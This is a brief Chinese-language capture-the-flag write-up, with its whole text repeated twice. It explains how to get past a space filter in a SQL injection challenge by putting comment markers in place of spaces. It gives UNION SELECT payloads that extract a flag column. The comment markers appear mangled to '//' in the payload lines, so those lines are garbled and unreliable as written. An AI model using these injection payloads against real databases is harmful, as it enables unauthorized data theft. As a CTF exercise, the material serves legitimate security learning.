输入数字有回显
在数字前加空格则会出现hacker
所以得知过滤了空格
搜索可知空格可用注释符/* */代替
用/* */代替空格 联合注入要输入 union select
1’and//1=2//union//select//flag//from//flag//#
用1,2…去试经测试 payload:
1’and//1=2//union//select//1,2,flag//from//flag//#
即可得flag
输入数字有回显
在数字前加空格则会出现hacker
所以得知过滤了空格
搜索可知空格可用注释符/* */代替
用/* */代替空格 联合注入要输入 union select
1’and//1=2//union//select//flag//from//flag//#
用1,2…去试经测试 payload:
1’and//1=2//union//select//1,2,flag//from//flag//#
即可得flag